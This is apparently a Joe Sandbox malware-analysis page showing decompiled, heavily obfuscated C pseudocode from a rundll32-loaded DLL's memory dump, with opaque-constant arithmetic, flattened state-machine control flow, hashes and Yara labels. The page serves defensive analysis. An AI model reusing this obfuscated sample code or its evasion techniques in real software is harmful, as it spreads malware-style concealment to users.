                                                                        Function 10001658, Relevance: 10.3, Strings: 8, Instructions: 285COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E10001658(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t280;
				intOrPtr* _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				void* _t313;
				intOrPtr* _t337;
				void* _t338;
				void* _t341;
				signed int* _t342;

				_t342 =  &_v112;
				_v76 = 0x33fd;
				_v76 = _v76 + 0xc49f;
				_v76 = _v76 * 0x29;
				_t341 = __edx;
				_v76 = _v76 ^ 0x0027ed19;
				_v32 = 0xcc47;
				_t292 = __ecx;
				_t337 = 0;
				_t294 = 0x55;
				_v32 = _v32 / _t294;
				_v32 = _v32 ^ 0x00006db6;
				_t338 = 0x2fa674f5;
				_v72 = 0x6a0a;
				_v72 = _v72 + 0xffff61af;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0000c658;
				_v28 = 0xdc12;
				_v28 = _v28 + 0xffffa614;
				_v28 = _v28 ^ 0x0000bab7;
				_v64 = 0x618;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0xcf790140;
				_v64 = _v64 ^ 0xcf796a5a;
				_v108 = 0x7f72;
				_t295 = 0xe;
				_v108 = _v108 * 0x4b;
				_v108 = _v108 | 0xd60feb69;
				_v108 = _v108 ^ 0xd62f8cb3;
				_v112 = 0x24c;
				_v112 = _v112 / _t295;
				_v112 = _v112 | 0xf1ea6f15;
				_v112 = _v112 * 5;
				_v112 = _v112 ^ 0xb9941bfd;
				_v68 = 0xf170;
				_v68 = _v68 | 0xaf46648c;
				_v68 = _v68 ^ 0xc1ce5702;
				_v68 = _v68 ^ 0x6e88e0f6;
				_v20 = 0xb551;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x001a3386;
				_v24 = 0x298e;
				_v24 = _v24 * 0x76;
				_v24 = _v24 ^ 0x001331c5;
				_v60 = 0x8d97;
				_v60 = _v60 >> 2;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x0000628a;
				_v104 = 0x3b43;
				_v104 = _v104 >> 0xb;
				_v104 = _v104 + 0x60ed;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x060f18e7;
				_v56 = 0x22a0;
				_v56 = _v56 << 0xa;
				_v56 = _v56 | 0xb5955f6a;
				_v56 = _v56 ^ 0xb59ff508;
				_v96 = 0xc755;
				_v96 = _v96 + 0xffff502d;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x00007dd0;
				_v100 = 0xa33d;
				_t296 = 0x22;
				_v100 = _v100 / _t296;
				_t297 = 0x28;
				_v100 = _v100 * 0x21;
				_v100 = _v100 | 0xc89f00a3;
				_v100 = _v100 ^ 0xc89f9ef6;
				_v16 = 0x20c7;
				_v16 = _v16 + 0xecf3;
				_v16 = _v16 ^ 0x00014c0a;
				_v40 = 0x76db;
				_v40 = _v40 >> 9;
				_v40 = _v40 + 0x6d1d;
				_v40 = _v40 ^ 0x000061d8;
				_v44 = 0x71d;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 + 0xff5b;
				_v44 = _v44 ^ 0x0000e72e;
				_v48 = 0x8b38;
				_v48 = _v48 ^ 0xf66aca43;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x905ecaad;
				_v12 = 0xfda7;
				_v12 = _v12 ^ 0xcb86e1f3;
				_v12 = _v12 ^ 0xcb86358a;
				_v52 = 0x79a1;
				_v52 = _v52 | 0x05e61714;
				_v52 = _v52 * 0x59;
				_v52 = _v52 ^ 0x0d220a4b;
				_v92 = 0x6d1;
				_v92 = _v92 ^ 0xaab1ecb0;
				_v92 = _v92 ^ 0x7a5f7ff4;
				_v92 = _v92 | 0x9dbc7c28;
				_v92 = _v92 ^ 0xddfeba29;
				_v4 = 0xb969;
				_v4 = _v4 + 0xffff29a6;
				_v4 = _v4 ^ 0xffffac55;
				_v8 = 0x80c1;
				_v8 = _v8 / _t297;
				_v8 = _v8 ^ 0x00007b2b;
				_v80 = 0x88c7;
				_t298 = 0x72;
				_v80 = _v80 * 0x11;
				_v80 = _v80 | 0x43e442c5;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x087de60e;
				_v84 = 0xaa5;
				_v84 = _v84 * 0x44;
				_v84 = _v84 / _t298;
				_t299 = 0x68;
				_v84 = _v84 / _t299;
				_v84 = _v84 ^ 0x00006b9b;
				_v88 = 0x4374;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0x8882;
				_t300 = 0x1f;
				_v88 = _v88 / _t300;
				_v88 = _v88 ^ 0x00003aab;
				_v36 = 0xe64;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 ^ 0x5e386e4c;
				_v36 = _v36 ^ 0x5e3850f6;
				while(1) {
					L1:
					_t280 = 0x220f80b2;
					while(1) {
						L2:
						_t301 = 0x34935044;
						do {
							L3:
							while(_t338 != 0x12347269) {
								if(_t338 == _t280) {
									_t282 = E1000D6D8(_v40, _v44, _t301, E1000213E, _v48, _t301, _t337, _t301, _t301, _v12, _v52);
									_t342 =  &(_t342[9]);
									 *((intOrPtr*)(_t337 + 4)) = _t282;
									__eflags = _t282;
									_t301 = 0x34935044;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x34935044 : 0x12347269;
									continue;
								}
								if(_t338 == 0x269b78c0) {
									_t283 = E10008997(_v56, _v96, _v100, _v16,  *_t337);
									_t342 =  &(_t342[3]);
									 *((intOrPtr*)(_t337 + 0x1c)) = _t283;
									__eflags = _t283;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x220f80b2 : 0x12347269;
									L2:
									_t301 = 0x34935044;
									continue;
								}
								if(_t338 == 0x29978df7) {
									_push(_v28);
									_t284 = E10005BE1(_v72, _t341, __eflags, _t301);
									 *_t337 = _t284;
									__eflags = _t284;
									if(__eflags == 0) {
										_t338 = 0x2b89b2cd;
									} else {
										E100039D1(_v108, _v112,  *_t337, _v68, _t284);
										E100056B3(_v24, _v60,  *_t337, _v104);
										_t342 =  &(_t342[7]);
										_t338 = 0x269b78c0;
									}
									while(1) {
										L1:
										_t280 = 0x220f80b2;
										goto L2;
									}
								}
								if(_t338 == 0x2b89b2cd) {
									return E100091CD(_v80, _v84, _v88, _t337, _v36);
								}
								if(_t338 == 0x2fa674f5) {
									_push(_t301);
									_t313 = 0x24;
									_t290 = E100157E8(_t313);
									_t337 = _t290;
									__eflags = _t337;
									if(__eflags == 0) {
										return _t290;
									}
									_t338 = 0x29978df7;
									goto L1;
								}
								if(_t338 != _t301) {
									goto L19;
								}
								 *((intOrPtr*)(_t337 + 0x20)) = _t292;
								_t291 =  *0x10021400; // 0x0
								 *((intOrPtr*)(_t337 + 0x10)) = _t291;
								 *0x10021400 = _t337;
								return _t291;
							}
							E10018C8B(_v92, _v4, _v8,  *_t337);
							_t338 = 0x2b89b2cd;
							_t280 = 0x220f80b2;
							_t301 = 0x34935044;
							L19:
							__eflags = _t338 - 0x92c1d44;
						} while (__eflags != 0);
						return _t280;
					}
				}
			}



















































                                                                        0x10001658
                                                                        0x1000165b
                                                                        0x10001663
                                                                        0x10001674
                                                                        0x10001678
                                                                        0x1000167a
                                                                        0x10001684
                                                                        0x1000168c
                                                                        0x10001692
                                                                        0x10001696
                                                                        0x1000169b
                                                                        0x100016a1
                                                                        0x100016a9
                                                                        0x100016ae
                                                                        0x100016b6
                                                                        0x100016be
                                                                        0x100016c3
                                                                        0x100016cb
                                                                        0x100016d3
                                                                        0x100016db
                                                                        0x100016e3
                                                                        0x100016eb
                                                                        0x100016f0
                                                                        0x100016f8
                                                                        0x10001700
                                                                        0x1000170d
                                                                        0x1000170e
                                                                        0x10001712
                                                                        0x1000171a
                                                                        0x10001722
                                                                        0x10001730
                                                                        0x10001734
                                                                        0x10001741
                                                                        0x10001745
                                                                        0x1000174d
                                                                        0x10001755
                                                                        0x1000175d
                                                                        0x10001765
                                                                        0x1000176d
                                                                        0x1000177a
                                                                        0x1000177e
                                                                        0x10001786
                                                                        0x10001793
                                                                        0x10001797
                                                                        0x1000179f
                                                                        0x100017a7
                                                                        0x100017ac
                                                                        0x100017b1
                                                                        0x100017b9
                                                                        0x100017c1
                                                                        0x100017c6
                                                                        0x100017ce
                                                                        0x100017d3
                                                                        0x100017db
                                                                        0x100017e3
                                                                        0x100017e8
                                                                        0x100017f0
                                                                        0x100017f8
                                                                        0x10001800
                                                                        0x10001808
                                                                        0x1000180d
                                                                        0x10001812
                                                                        0x1000181c
                                                                        0x1000182a
                                                                        0x1000182f
                                                                        0x1000183a
                                                                        0x1000183d
                                                                        0x10001841
                                                                        0x10001849
                                                                        0x10001851
                                                                        0x10001859
                                                                        0x10001861
                                                                        0x10001869
                                                                        0x10001871
                                                                        0x10001876
                                                                        0x1000187e
                                                                        0x10001886
                                                                        0x1000188e
                                                                        0x10001893
                                                                        0x1000189b
                                                                        0x100018a3
                                                                        0x100018ab
                                                                        0x100018b3
                                                                        0x100018b8
                                                                        0x100018c0
                                                                        0x100018c8
                                                                        0x100018d0
                                                                        0x100018d8
                                                                        0x100018e0
                                                                        0x100018ed
                                                                        0x100018f1
                                                                        0x100018f9
                                                                        0x10001901
                                                                        0x10001909
                                                                        0x10001911
                                                                        0x10001919
                                                                        0x10001921
                                                                        0x1000192c
                                                                        0x10001937
                                                                        0x10001942
                                                                        0x10001952
                                                                        0x10001956
                                                                        0x1000195e
                                                                        0x1000196b
                                                                        0x1000196e
                                                                        0x10001972
                                                                        0x1000197a
                                                                        0x1000197f
                                                                        0x10001987
                                                                        0x10001994
                                                                        0x100019a0
                                                                        0x100019a8
                                                                        0x100019ad
                                                                        0x100019b3
                                                                        0x100019bb
                                                                        0x100019c3
                                                                        0x100019c7
                                                                        0x100019d3
                                                                        0x100019d6
                                                                        0x100019da
                                                                        0x100019e2
                                                                        0x100019ea
                                                                        0x100019ef
                                                                        0x100019f7
                                                                        0x100019ff
                                                                        0x100019ff
                                                                        0x100019ff
                                                                        0x10001a04
                                                                        0x10001a04
                                                                        0x10001a04
                                                                        0x10001a09
                                                                        0x00000000
                                                                        0x10001a09
                                                                        0x10001a17
                                                                        0x10001b3c
                                                                        0x10001b41
                                                                        0x10001b44
                                                                        0x10001b47
                                                                        0x10001b4e
                                                                        0x10001b53
                                                                        0x10001b58
                                                                        0x00000000
                                                                        0x10001b58
                                                                        0x10001a23
                                                                        0x10001aff
                                                                        0x10001b04
                                                                        0x10001b07
                                                                        0x10001b0a
                                                                        0x10001b11
                                                                        0x10001b16
                                                                        0x10001a04
                                                                        0x10001a04
                                                                        0x00000000
                                                                        0x10001a04
                                                                        0x10001a2f
                                                                        0x10001a89
                                                                        0x10001a94
                                                                        0x10001a99
                                                                        0x10001a9d
                                                                        0x10001a9f
                                                                        0x10001ae3
                                                                        0x10001aa1
                                                                        0x10001ab4
                                                                        0x10001ad1
                                                                        0x10001ad6
                                                                        0x10001ad9
                                                                        0x10001ad9
                                                                        0x100019ff
                                                                        0x100019ff
                                                                        0x100019ff
                                                                        0x00000000
                                                                        0x100019ff
                                                                        0x100019ff
                                                                        0x10001a37
                                                                        0x00000000
                                                                        0x10001bab
                                                                        0x10001a43
                                                                        0x10001a6b
                                                                        0x10001a6e
                                                                        0x10001a6f
                                                                        0x10001a74
                                                                        0x10001a77
                                                                        0x10001a79
                                                                        0x10001bb5
                                                                        0x10001bb5
                                                                        0x10001a7f
                                                                        0x00000000
                                                                        0x10001a7f
                                                                        0x10001a47
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10001a4d
                                                                        0x10001a50
                                                                        0x10001a55
                                                                        0x10001a58
                                                                        0x00000000
                                                                        0x10001a58
                                                                        0x10001b71
                                                                        0x10001b78
                                                                        0x10001b7d
                                                                        0x10001b82
                                                                        0x10001b87
                                                                        0x10001b87
                                                                        0x10001b87
                                                                        0x00000000
                                                                        0x10001a09
                                                                        0x10001a04

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: j$+{$.$K"$K"$Ln8^$tC$`
                                                                        • API String ID: 0-3859911108
                                                                        • Opcode ID: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
                                                                        • Instruction ID: 31beb1e1d2509969b8c97709e2d0e8827b8fffe3f774f18c97f02cb453e1c763
                                                                        • Opcode Fuzzy Hash: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
                                                                        • Instruction Fuzzy Hash: D9D142715083819FE398CF25C48A40BFBE1FBC4788F108A1EF5999A2A4D7B5D945CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001D530, Relevance: 10.3, Strings: 8, Instructions: 271COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E1001D530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				char _t277;
				void* _t302;
				void* _t313;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				intOrPtr _t353;
				signed int* _t356;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				_t277 = E100056B2(0);
				_v72 = _t277;
				_t353 = _t277;
				_v140 = 0xcf77;
				_t356 =  &(( &_v180)[0xa]);
				_v140 = _v140 | 0x06dd099f;
				_v140 = _v140 ^ 0x2b3fcad2;
				_t313 = 0x28b49c8b;
				_v140 = _v140 ^ 0x2de2012d;
				_v164 = 0xc4bc;
				_v164 = _v164 << 9;
				_t344 = 9;
				_v164 = _v164 * 0x2c;
				_v164 = _v164 / _t344;
				_v164 = _v164 ^ 0x0783a020;
				_v112 = 0x2b8e;
				_v112 = _v112 + 0xffffae8b;
				_t345 = 0x76;
				_v112 = _v112 * 0x7c;
				_v112 = _v112 ^ 0xffedb6fa;
				_v144 = 0xac6;
				_v144 = _v144 / _t345;
				_t346 = 0x7c;
				_v144 = _v144 / _t346;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x00001557;
				_v152 = 0xab69;
				_v152 = _v152 + 0xa2f;
				_v152 = _v152 >> 5;
				_v152 = _v152 + 0xffff79cf;
				_v152 = _v152 ^ 0xffff27b1;
				_v108 = 0x73cc;
				_v108 = _v108 + 0x480f;
				_t347 = 0x59;
				_v108 = _v108 / _t347;
				_v108 = _v108 ^ 0x000020fd;
				_v100 = 0x373b;
				_v100 = _v100 * 0x66;
				_v100 = _v100 ^ 0x0016182c;
				_v104 = 0xe7a6;
				_v104 = _v104 ^ 0xf29de3d2;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x000f640c;
				_v88 = 0x7bd1;
				_v88 = _v88 + 0xffff741d;
				_v88 = _v88 ^ 0xffffa91a;
				_v80 = 0x1764;
				_t348 = 0x17;
				_v80 = _v80 / _t348;
				_v80 = _v80 ^ 0x00004d9b;
				_v168 = 0x40e5;
				_v168 = _v168 | 0x95416268;
				_v168 = _v168 + 0xffffdda2;
				_t349 = 0x3d;
				_v168 = _v168 * 0x7e;
				_v168 = _v168 ^ 0x761d93b5;
				_v176 = 0x5c39;
				_v176 = _v176 << 3;
				_v176 = _v176 ^ 0x82f9fe57;
				_v176 = _v176 + 0xf301;
				_v176 = _v176 ^ 0x82fc4bf9;
				_v180 = 0x8c1a;
				_v180 = _v180 / _t349;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 + 0x261d;
				_v180 = _v180 ^ 0x00004a95;
				_v124 = 0xc582;
				_t350 = 0x1d;
				_v124 = _v124 * 0x1f;
				_v124 = _v124 | 0xf6103699;
				_v124 = _v124 ^ 0xf617990a;
				_v156 = 0xd28e;
				_v156 = _v156 | 0xfa81b7f3;
				_v156 = _v156 << 9;
				_v156 = _v156 / _t350;
				_v156 = _v156 ^ 0x0022cbe3;
				_v96 = 0x6edc;
				_v96 = _v96 ^ 0x578c8574;
				_v96 = _v96 ^ 0x578c878c;
				_v172 = 0x2912;
				_t351 = 0x52;
				_v172 = _v172 * 0x42;
				_v172 = _v172 + 0xffffd848;
				_v172 = _v172 ^ 0xff29ff1d;
				_v172 = _v172 ^ 0xff239d47;
				_v116 = 0x4964;
				_v116 = _v116 + 0xffff6a3d;
				_v116 = _v116 << 8;
				_v116 = _v116 ^ 0xffb3a2b5;
				_v148 = 0x2770;
				_v148 = _v148 | 0xc18e9b46;
				_v148 = _v148 + 0xd34e;
				_v148 = _v148 | 0xf482d9fb;
				_v148 = _v148 ^ 0xf58f8d3b;
				_v76 = 0x8840;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x00221890;
				_v160 = 0xa0de;
				_v160 = _v160 / _t351;
				_v160 = _v160 + 0x938c;
				_v160 = _v160 + 0xffff507f;
				_v160 = _v160 ^ 0xffff887d;
				_v120 = 0xf500;
				_v120 = _v120 + 0xffff51ff;
				_v120 = _v120 * 0x5a;
				_v120 = _v120 ^ 0x0018abed;
				_v128 = 0xf1ed;
				_v128 = _v128 | 0x9ee1ceb0;
				_v128 = _v128 + 0xfdb4;
				_v128 = _v128 ^ 0x9ee2bb44;
				_v132 = 0xb4e7;
				_v132 = _v132 + 0x6d7b;
				_v132 = _v132 ^ 0xeb6cebb2;
				_v132 = _v132 ^ 0xeb6d8bab;
				_v136 = 0x4487;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 | 0x68b8f7cc;
				_v136 = _v136 ^ 0x68b888c6;
				_v84 = 0xd92;
				_v84 = _v84 + 0xffffee93;
				_v84 = _v84 ^ 0xfffffb14;
				_v92 = 0x6345;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x000649ac;
				do {
					while(_t313 != 0x36a85ef) {
						if(_t313 == 0x278fc742) {
							E10001CB3( &_v68, _v108, 0x44, _v100);
							_push(0x100013e0);
							_push(_v80);
							_t316 = _v104;
							_v68 = 0x44;
							_v60 = E1001BF25(_v104, _v88, __eflags);
							_t353 = E10009BEB(_v168, _a20, _v72, _v104, _v176, _v180, _v164 | _v140, _a28, _t316, _t316,  &_v68, 0, _v124, _v156, _v96, _t316, _v172, _v116, _v148, _v76, _a8);
							E1001C5F7(_v160, _v120, _v128, _v132, _v60);
							_t356 =  &(_t356[0x1a]);
							_t313 = 0x2f47876d;
							continue;
						} else {
							if(_t313 == 0x28b49c8b) {
								_t313 = 0x36a85ef;
								continue;
							} else {
								if(_t313 != 0x2f47876d) {
									goto L12;
								} else {
									E1001B11F(_v136, _v72, _v84, _v92);
								}
							}
						}
						L6:
						return _t353;
					}
					_t302 = E10003A7E(_v112, _v144, _t313,  &_v72, _v152, _a28);
					_t356 =  &(_t356[4]);
					__eflags = _t302;
					if(_t302 == 0) {
						_t313 = 0x349a93df;
						goto L12;
					} else {
						_t313 = 0x278fc742;
						continue;
					}
					goto L6;
					L12:
					__eflags = _t313 - 0x349a93df;
				} while (_t313 != 0x349a93df);
				goto L6;
			}














































                                                                        0x1001d53a
                                                                        0x1001d543
                                                                        0x1001d54a
                                                                        0x1001d551
                                                                        0x1001d558
                                                                        0x1001d55f
                                                                        0x1001d566
                                                                        0x1001d56d
                                                                        0x1001d574
                                                                        0x1001d575
                                                                        0x1001d576
                                                                        0x1001d57b
                                                                        0x1001d582
                                                                        0x1001d584
                                                                        0x1001d58c
                                                                        0x1001d58f
                                                                        0x1001d599
                                                                        0x1001d5a1
                                                                        0x1001d5a6
                                                                        0x1001d5ae
                                                                        0x1001d5b6
                                                                        0x1001d5c2
                                                                        0x1001d5c5
                                                                        0x1001d5d1
                                                                        0x1001d5d5
                                                                        0x1001d5dd
                                                                        0x1001d5e5
                                                                        0x1001d5f2
                                                                        0x1001d5f5
                                                                        0x1001d5f9
                                                                        0x1001d601
                                                                        0x1001d611
                                                                        0x1001d619
                                                                        0x1001d61e
                                                                        0x1001d624
                                                                        0x1001d629
                                                                        0x1001d631
                                                                        0x1001d639
                                                                        0x1001d641
                                                                        0x1001d646
                                                                        0x1001d64e
                                                                        0x1001d656
                                                                        0x1001d65e
                                                                        0x1001d66a
                                                                        0x1001d66d
                                                                        0x1001d671
                                                                        0x1001d679
                                                                        0x1001d686
                                                                        0x1001d68a
                                                                        0x1001d692
                                                                        0x1001d69a
                                                                        0x1001d6a2
                                                                        0x1001d6a7
                                                                        0x1001d6af
                                                                        0x1001d6b7
                                                                        0x1001d6bf
                                                                        0x1001d6c7
                                                                        0x1001d6d7
                                                                        0x1001d6dc
                                                                        0x1001d6e2
                                                                        0x1001d6ea
                                                                        0x1001d6f2
                                                                        0x1001d6fa
                                                                        0x1001d707
                                                                        0x1001d70a
                                                                        0x1001d70e
                                                                        0x1001d716
                                                                        0x1001d71e
                                                                        0x1001d723
                                                                        0x1001d72b
                                                                        0x1001d733
                                                                        0x1001d73b
                                                                        0x1001d74b
                                                                        0x1001d74f
                                                                        0x1001d754
                                                                        0x1001d75c
                                                                        0x1001d764
                                                                        0x1001d771
                                                                        0x1001d774
                                                                        0x1001d778
                                                                        0x1001d780
                                                                        0x1001d788
                                                                        0x1001d790
                                                                        0x1001d798
                                                                        0x1001d7a5
                                                                        0x1001d7a9
                                                                        0x1001d7b1
                                                                        0x1001d7b9
                                                                        0x1001d7c1
                                                                        0x1001d7c9
                                                                        0x1001d7d6
                                                                        0x1001d7d7
                                                                        0x1001d7db
                                                                        0x1001d7e3
                                                                        0x1001d7eb
                                                                        0x1001d7f3
                                                                        0x1001d7fb
                                                                        0x1001d803
                                                                        0x1001d808
                                                                        0x1001d810
                                                                        0x1001d818
                                                                        0x1001d820
                                                                        0x1001d828
                                                                        0x1001d830
                                                                        0x1001d838
                                                                        0x1001d840
                                                                        0x1001d845
                                                                        0x1001d84d
                                                                        0x1001d85b
                                                                        0x1001d85f
                                                                        0x1001d867
                                                                        0x1001d86f
                                                                        0x1001d877
                                                                        0x1001d87f
                                                                        0x1001d88c
                                                                        0x1001d890
                                                                        0x1001d898
                                                                        0x1001d8a0
                                                                        0x1001d8a8
                                                                        0x1001d8b5
                                                                        0x1001d8c2
                                                                        0x1001d8cf
                                                                        0x1001d8d7
                                                                        0x1001d8df
                                                                        0x1001d8e7
                                                                        0x1001d8ef
                                                                        0x1001d8f4
                                                                        0x1001d8fc
                                                                        0x1001d904
                                                                        0x1001d90c
                                                                        0x1001d914
                                                                        0x1001d91c
                                                                        0x1001d924
                                                                        0x1001d929
                                                                        0x1001d931
                                                                        0x1001d931
                                                                        0x1001d93b
                                                                        0x1001d98d
                                                                        0x1001d992
                                                                        0x1001d997
                                                                        0x1001d9a2
                                                                        0x1001d9a6
                                                                        0x1001d9c0
                                                                        0x1001da27
                                                                        0x1001da42
                                                                        0x1001da47
                                                                        0x1001da4a
                                                                        0x00000000
                                                                        0x1001d93d
                                                                        0x1001d943
                                                                        0x1001d978
                                                                        0x00000000
                                                                        0x1001d945
                                                                        0x1001d94b
                                                                        0x00000000
                                                                        0x1001d951
                                                                        0x1001d964
                                                                        0x1001d96a
                                                                        0x1001d94b
                                                                        0x1001d943
                                                                        0x1001d96c
                                                                        0x1001d977
                                                                        0x1001d977
                                                                        0x1001da70
                                                                        0x1001da75
                                                                        0x1001da78
                                                                        0x1001da7a
                                                                        0x1001da83
                                                                        0x00000000
                                                                        0x1001da7c
                                                                        0x1001da7c
                                                                        0x00000000
                                                                        0x1001da7c
                                                                        0x00000000
                                                                        0x1001da85
                                                                        0x1001da85
                                                                        0x1001da85
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 9\$;7$D$Ec$dI$p'${m$@
                                                                        • API String ID: 0-4186577645
                                                                        • Opcode ID: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
                                                                        • Instruction ID: 2df3e07cde59ac68a4d410155b42b42f4bafc48a528185daffa6966fbd240ac9
                                                                        • Opcode Fuzzy Hash: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
                                                                        • Instruction Fuzzy Hash: 95D100B15087819FE364CF65C88AA0FBBE1FBC4344F108A1DF6959A2A0D7B59945CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018F65, Relevance: 10.2, Strings: 8, Instructions: 246COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10018F65() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t253;
				signed int _t254;
				void* _t256;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				void* _t273;
				void* _t279;
				void* _t305;
				signed int* _t309;

				_t309 =  &_v108;
				_v12 = 0x296bf2;
				_v4 = 0;
				_v8 = 0x4bf1e;
				_v100 = 0x2b2b;
				_v100 = _v100 >> 2;
				_v100 = _v100 ^ 0x417d2759;
				_v16 = 0;
				_t10 =  &_v100; // 0x417d2759
				_v100 =  *_t10 * 0x44;
				_t305 = 0x7c03eab;
				_v100 = _v100 ^ 0xe5401b0d;
				_v76 = 0xb627;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0xc3e66578;
				_v76 = _v76 ^ 0xc3e6657f;
				_v104 = 0x24d5;
				_v104 = _v104 + 0x5447;
				_t265 = 0x57;
				_v104 = _v104 / _t265;
				_t266 = 0x28;
				_v104 = _v104 * 0x32;
				_v104 = _v104 ^ 0x000071f7;
				_v40 = 0x5f61;
				_v40 = _v40 + 0xd6ed;
				_v40 = _v40 ^ 0x000138b6;
				_v108 = 0x6b22;
				_v108 = _v108 * 0x6c;
				_v108 = _v108 << 8;
				_v108 = _v108 + 0x6d5c;
				_v108 = _v108 ^ 0x2d328325;
				_v92 = 0x5cf3;
				_v92 = _v92 | 0xe469743c;
				_v92 = _v92 ^ 0x31335b62;
				_v92 = _v92 >> 6;
				_v92 = _v92 ^ 0x0355473e;
				_v64 = 0xc70a;
				_v64 = _v64 + 0xfffff4c9;
				_v64 = _v64 ^ 0x3b15d897;
				_v64 = _v64 ^ 0x3b156e76;
				_v68 = 0xfd7d;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x951;
				_v68 = _v68 ^ 0x00007938;
				_v96 = 0x3fdb;
				_t267 = 0x66;
				_v96 = _v96 / _t267;
				_v96 = _v96 | 0x3c76ff0b;
				_t268 = 0x58;
				_v96 = _v96 * 0x45;
				_v96 = _v96 ^ 0x4c12cf42;
				_v72 = 0x1a5;
				_v72 = _v72 | 0xb959885f;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000bb2ca;
				_v36 = 0x7797;
				_v36 = _v36 / _t268;
				_v36 = _v36 ^ 0x0000700b;
				_v28 = 0xb618;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x005b051c;
				_v88 = 0xdec6;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x6f8cff66;
